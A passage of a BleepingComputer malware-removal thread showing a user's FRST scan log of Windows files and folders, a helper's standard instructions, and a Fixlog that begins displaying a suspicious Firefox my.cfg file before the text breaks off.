2015-03-10 23:16 - 2015-01-28 18:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-03-10 23:16 - 2015-01-28 18:11 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-03-10 23:16 - 2015-01-28 18:04 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-03-10 23:16 - 2015-01-28 18:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-03-10 23:16 - 2015-01-28 18:00 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-03-10 23:16 - 2015-01-28 17:59 - 02773504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-03-10 23:16 - 2015-01-28 17:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-03-10 23:16 - 2015-01-28 17:50 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-03-10 23:16 - 2015-01-28 17:49 - 02459136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-03-10 23:16 - 2015-01-27 19:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-03-10 23:16 - 2015-01-27 18:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-03-10 23:16 - 2015-01-27 16:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-03-10 23:16 - 2015-01-27 16:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-03-10 23:16 - 2015-01-23 00:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-03-10 23:16 - 2015-01-22 22:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-03-10 23:16 - 2014-12-10 22:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-03-10 23:16 - 2014-10-28 19:46 - 00081920 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2015-03-10 23:16 - 2014-10-28 19:46 - 00053248 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2015-03-10 23:16 - 2014-10-28 19:45 - 01198080 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2015-03-10 23:16 - 2014-10-28 19:43 - 00062976 _____ (Microsoft Corporation) C:\WINDOWS\system32\printui.exe
2015-03-10 23:16 - 2014-10-28 19:34 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-03-10 23:16 - 2014-10-28 19:34 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSCollect.exe
2015-03-10 23:16 - 2014-10-28 19:34 - 00079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSReset.exe
2015-03-10 23:16 - 2014-10-28 19:04 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\findnetprinters.dll
2015-03-10 23:16 - 2014-10-28 19:03 - 00241152 ____C (Microsoft Corporation) C:\WINDOWS\system32\fsquirt.exe
2015-03-10 23:16 - 2014-10-28 18:58 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\printui.exe
2015-03-10 23:16 - 2014-10-28 18:52 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\compstui.dll
2015-03-10 23:16 - 2014-10-28 18:51 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-03-10 23:16 - 2014-10-28 18:45 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\prnntfy.dll
2015-03-10 23:16 - 2014-10-28 18:28 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2015-03-10 23:16 - 2014-10-28 18:28 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\atlthunk.dll
2015-03-10 23:16 - 2014-10-28 18:20 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-03-10 23:16 - 2014-10-28 18:19 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll
2015-03-10 23:16 - 2014-10-28 18:15 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\prnntfy.dll
2015-03-10 23:16 - 2014-10-28 18:13 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2015-03-10 23:16 - 2014-10-28 17:59 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll
2015-03-10 23:16 - 2014-10-28 17:55 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2015-03-10 23:16 - 2014-10-28 17:55 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiapi.dll
2015-03-10 23:16 - 2014-10-28 17:44 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiapi.dll
2015-03-10 23:16 - 2014-10-28 17:41 - 00269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\DafPrintProvider.dll
2015-03-10 23:16 - 2014-10-28 17:35 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DafPrintProvider.dll
2015-03-10 21:27 - 2015-03-05 19:53 - 00430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-03-10 21:27 - 2015-03-05 19:33 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-03-10 21:27 - 2015-02-25 16:26 - 04178944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-03-10 21:27 - 2015-02-20 18:16 - 25021440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-03-10 21:27 - 2015-02-20 17:41 - 12827648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-03-10 21:27 - 2015-02-20 17:27 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-03-10 21:27 - 2015-02-20 17:27 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-03-10 21:27 - 2015-02-20 17:25 - 19720192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-03-10 21:27 - 2015-02-20 16:58 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-03-10 21:27 - 2015-02-20 16:32 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-03-10 21:27 - 2015-02-19 20:03 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-03-10 21:27 - 2015-02-19 19:58 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-03-10 21:27 - 2015-02-19 19:49 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-03-10 21:27 - 2015-02-19 19:48 - 02886144 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-03-10 21:27 - 2015-02-19 19:47 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-03-10 21:27 - 2015-02-19 19:35 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-03-10 21:27 - 2015-02-19 19:34 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-03-10 21:27 - 2015-02-19 19:32 - 06035456 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-03-10 21:27 - 2015-02-19 19:20 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-03-10 21:27 - 2015-02-19 19:15 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-03-10 21:27 - 2015-02-19 19:09 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-03-10 21:27 - 2015-02-19 19:07 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-03-10 21:27 - 2015-02-19 19:06 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-03-10 21:27 - 2015-02-19 19:05 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-03-10 21:27 - 2015-02-19 19:03 - 02278400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-03-10 21:27 - 2015-02-19 18:59 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-03-10 21:27 - 2015-02-19 18:56 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-03-10 21:27 - 2015-02-19 18:52 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-03-10 21:27 - 2015-02-19 18:49 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-03-10 21:27 - 2015-02-19 18:49 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-03-10 21:27 - 2015-02-19 18:46 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-03-10 21:27 - 2015-02-19 18:43 - 14398976 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-03-10 21:27 - 2015-02-19 18:30 - 04300288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-03-10 21:27 - 2015-02-19 18:30 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-03-10 21:27 - 2015-02-19 18:29 - 02865152 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-03-10 21:27 - 2015-02-19 18:28 - 02358784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-03-10 21:27 - 2015-02-19 18:26 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-03-10 21:27 - 2015-02-19 18:24 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-03-10 21:27 - 2015-02-19 18:24 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-03-10 21:27 - 2015-02-19 18:16 - 01548288 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-03-10 21:27 - 2015-02-19 18:03 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-03-10 21:27 - 2015-02-19 18:01 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-03-10 21:27 - 2015-02-19 17:57 - 01311232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-03-10 21:27 - 2015-02-19 17:55 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-03-10 21:27 - 2015-02-12 10:40 - 22291584 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-03-10 21:27 - 2015-02-12 10:34 - 19731824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-03-10 21:27 - 2015-01-30 16:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-03-10 21:27 - 2015-01-29 11:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-03-10 21:27 - 2015-01-29 11:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-03-10 21:27 - 2015-01-28 08:41 - 07472960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-03-10 21:27 - 2015-01-28 08:41 - 01733440 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-03-10 21:27 - 2015-01-28 08:41 - 01498360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-03-10 21:27 - 2015-01-27 18:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-03-10 21:27 - 2015-01-27 18:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-03-10 21:27 - 2015-01-26 21:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-03-10 21:27 - 2015-01-26 19:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-03-10 21:27 - 2015-01-20 22:54 - 01384712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-03-10 21:27 - 2015-01-20 22:15 - 01123848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-03-10 21:27 - 2014-10-28 20:56 - 00027456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdpvideominiport.sys
2015-03-10 21:27 - 2014-10-28 19:49 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2015-03-10 21:27 - 2014-10-28 19:44 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2015-03-10 21:27 - 2014-10-28 19:44 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2015-03-10 21:27 - 2014-10-28 19:37 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rfxvmt.dll
2015-03-10 21:27 - 2014-10-28 19:04 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2015-03-10 21:27 - 2014-10-28 19:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2015-03-10 21:27 - 2014-10-28 19:00 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-04-06 22:18 - 2013-11-02 23:33 - 00000924 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-04-06 22:17 - 2014-02-18 23:43 - 00495104 ___SH () C:\Users\User\Desktop\Thumbs.db
2015-04-06 22:15 - 2013-09-29 21:04 - 01513698 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-04-06 22:15 - 2013-07-30 11:55 - 00491784 _____ () C:\WINDOWS\system32\prfh0404.dat
2015-04-06 22:15 - 2013-07-30 11:55 - 00151910 _____ () C:\WINDOWS\system32\prfc0404.dat
2015-04-06 22:14 - 2013-10-26 01:53 - 00003598 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2601788436-2821952545-4294816460-1002
2015-04-06 22:12 - 2014-04-23 23:09 - 00000000 ____D () C:\Users\User\AppData\Local\CrashDumps
2015-04-06 22:10 - 2013-11-01 19:02 - 01445154 _____ () C:\WINDOWS\WindowsUpdate.log
2015-04-06 22:09 - 2013-11-02 23:33 - 00000920 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-06 22:09 - 2013-11-01 19:16 - 00000000 ___DO () C:\Users\User\SkyDrive
2015-04-06 22:09 - 2013-08-22 07:46 - 00593356 _____ () C:\WINDOWS\setupact.log
2015-04-06 22:09 - 2013-08-22 07:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\Super Radio
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\globalUpdate
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\0a1c1a41-5084-4b11-9f5e-84411f0df977
2015-04-06 22:08 - 2013-09-29 20:55 - 00151322 _____ () C:\WINDOWS\PFRO.log
2015-04-06 22:08 - 2013-08-22 06:25 - 00262144 ___SH () C:\WINDOWS\system32\config\BBI
2015-04-06 22:08 - 2013-07-22 10:57 - 00000000 ____D () C:\ProgramData\NVIDIA
2015-04-06 22:00 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2015-04-06 21:46 - 2013-10-31 20:20 - 00000000 ____D () C:\Users\User\AppData\Roaming\ClassicShell
2015-04-06 21:37 - 2014-08-13 20:12 - 00000000 ____D () C:\Users\User\AppData\Local\Adobe
2015-04-06 21:36 - 2013-12-31 18:03 - 00000000 ____D () C:\Users\User\Desktop\Utilities
2015-04-06 21:25 - 2013-11-01 10:46 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-04-05 21:18 - 2013-11-02 23:33 - 00002210 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-04 00:16 - 2013-11-02 13:43 - 00000000 ____D () C:\Users\User\AppData\Roaming\vlc
2015-04-03 21:58 - 2012-07-26 00:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
2015-03-30 23:48 - 2013-11-01 10:47 - 00000000 ____D () C:\Program Files (x86)\Steam
2015-03-30 23:42 - 2013-11-01 19:02 - 00000000 ____D () C:\Program Files\NVIDIA Corporation
2015-03-30 23:42 - 2013-11-01 19:02 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation
2015-03-30 23:30 - 2013-11-29 11:15 - 00001404 _____ () C:\Users\Public\Desktop\GeForce Experience.lnk
2015-03-30 23:20 - 2013-07-22 10:49 - 00000000 ____D () C:\WINDOWS\SysWOW64\sda
2015-03-30 23:20 - 2013-07-22 10:43 - 00000000 ____D () C:\Program Files (x86)\Realtek
2015-03-30 20:16 - 2013-11-01 10:12 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-03-29 23:57 - 2013-12-21 14:05 - 00000000 ____D () C:\Users\User\AppData\Roaming\foobar2000
2015-03-27 20:44 - 2014-07-30 23:13 - 01316000 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2015-03-27 20:44 - 2013-11-29 11:14 - 01316000 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2015-03-27 20:43 - 2014-07-30 23:13 - 01756424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2015-03-27 20:43 - 2013-11-29 11:14 - 01570672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2015-03-22 00:07 - 2015-03-05 00:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\H&R Block 2014
2015-03-15 16:46 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\rescache
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\WINDOWS\ToastData
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\WinStore
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\SysWOW64\zh-HK
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\system32\zh-HK
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\Program Files\Windows Defender
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2015-03-15 16:25 - 2013-08-22 07:44 - 05027712 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2015-03-13 12:41 - 2013-12-02 19:28 - 14121624 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvd3dum.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 03303448 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00997856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvumdshimx.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00878328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvumdshim.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00354112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00178512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvinitx.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00164568 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvinit.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00027441 _____ () C:\WINDOWS\system32\nvinfo.pb
2015-03-13 09:16 - 2013-12-02 19:30 - 06861968 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 03526856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 02559808 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 01099408 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 00935056 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvvsvc.exe
2015-03-13 09:16 - 2013-12-02 19:30 - 00386248 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 00075976 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 00062608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2015-03-11 06:10 - 2013-12-02 19:30 - 04246327 _____ () C:\WINDOWS\system32\nvcoproc.bin
2015-03-10 23:25 - 2013-11-03 18:05 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-03-10 23:24 - 2013-10-26 02:42 - 00000000 ____D () C:\WINDOWS\system32\MRT
2015-03-10 23:21 - 2013-10-26 02:42 - 122905848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2014-02-19 00:07 - 2014-02-19 00:07 - 0000132 _____ () C:\Users\User\AppData\Roaming\Adobe GIF Format CS6 Prefs
2014-02-18 23:57 - 2015-01-18 22:51 - 0000132 _____ () C:\Users\User\AppData\Roaming\Adobe PNG Format CS6 Prefs
2014-01-17 02:01 - 2014-03-03 00:03 - 0000578 _____ () C:\Users\User\AppData\Roaming\burnaware.ini
2015-03-31 01:14 - 2015-03-31 01:14 - 0004387 _____ () C:\Users\User\AppData\Roaming\oHBfPuiYh
2013-12-05 01:50 - 2013-12-05 01:50 - 0000092 _____ () C:\Users\User\AppData\Local\fusioncache.dat
2013-10-26 01:48 - 2014-09-02 23:50 - 0007633 _____ () C:\Users\User\AppData\Local\resmon.resmoncfg
2013-11-01 19:02 - 2013-11-01 19:02 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2014-02-21 08:42 - 2014-06-23 00:10 - 0006682 _____ () C:\ProgramData\hpzinstall.log
2014-02-06 19:54 - 2014-02-06 22:20 - 0000298 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-11-26 20:13 - 2014-11-26 20:13 - 0000105 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.64.bc

Some content of TEMP:
====================
C:\Users\User\AppData\Local\Temp\AdobeApplicationManager.exe
C:\Users\User\AppData\Local\Temp\AskSLib.dll
C:\Users\User\AppData\Local\Temp\AutoUpdate.exe
C:\Users\User\AppData\Local\Temp\COMAP.EXE
C:\Users\User\AppData\Local\Temp\drm_dialogs.dll
C:\Users\User\AppData\Local\Temp\drm_dyndata_7340014.dll
C:\Users\User\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpoqom_e.dll
C:\Users\User\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\User\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\User\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\User\AppData\Local\Temp\LMkRstPt.exe
C:\Users\User\AppData\Local\Temp\nv3DVStreaming.dll
C:\Users\User\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\User\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\User\AppData\Local\Temp\nvStereoApiI.dll
C:\Users\User\AppData\Local\Temp\nvStInst.exe
C:\Users\User\AppData\Local\Temp\OfficeSetup.exe
C:\Users\User\AppData\Local\Temp\ose00000.exe
C:\Users\User\AppData\Local\Temp\P2PStatReport.dll
C:\Users\User\AppData\Local\Temp\pi5lpuuv.dll
C:\Users\User\AppData\Local\Temp\sonarinst.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.1-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.2-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.3-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.5-win32.exe
C:\Users\User\AppData\Local\Temp\vsdel.exe
C:\Users\User\AppData\Local\Temp\xReflect.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-03-26 22:21

==================== End Of Log ============================

Edited by ah_hin, 07 April 2015 - 01:00 AM.



#2 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  • Local time:08:16 AM

Posted 07 April 2015 - 12:59 AM

I am having a hard time clicking the "Post" or "Edit" buttons, sorry about the confusion, but this malware is hard to bypass....

Edited by ah_hin, 07 April 2015 - 01:10 AM.


#3 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 07 April 2015 - 02:50 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will be working on your Malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Let me check something.

 

Next, please download the following file => and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

Regards,

Georgi



#4 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  • Local time:08:16 AM

Posted 07 April 2015 - 11:57 PM

Hi Georgi, thanks for helping me out!
Here is the fixlog.txt; does it matter that these files are inside a folder on the desktop?

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 11-03-2015
Ran by User at 2015-04-07 21:55:02 Run:1
Running from C:\Users\User\Desktop\Malware software
Loaded Profiles: User & (Available profiles: User)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
Folder: C:\Program Files (x86)\Mozilla Firefox\browser\defaults
Folder: C:\Program Files (x86)\Mozilla Firefox\defaults\pref
cmd: type "C:\Program Files (x86)\Mozilla Firefox\my.cfg"
*****************


========================= Folder: C:\Program Files (x86)\Mozilla Firefox\browser\defaults ========================

2015-04-06 20:18 - 2015-04-06 20:18 - 0000000 ____D () C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences
2015-03-25 10:32 - 2015-03-25 10:32 - 0000088 _____ () C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences\my-prefs.js

====== End of Folder: ======


========================= Folder: C:\Program Files (x86)\Mozilla Firefox\defaults\pref ========================

2015-03-21 09:44 - 2013-10-25 18:43 - 0000358 _____ () C:\Program Files (x86)\Mozilla Firefox\defaults\pref\channel-prefs.js

====== End of Folder: ======


========= type "C:\Program Files (x86)\Mozilla Firefox\my.cfg" =========


// First line is ommited
try{
(function() {
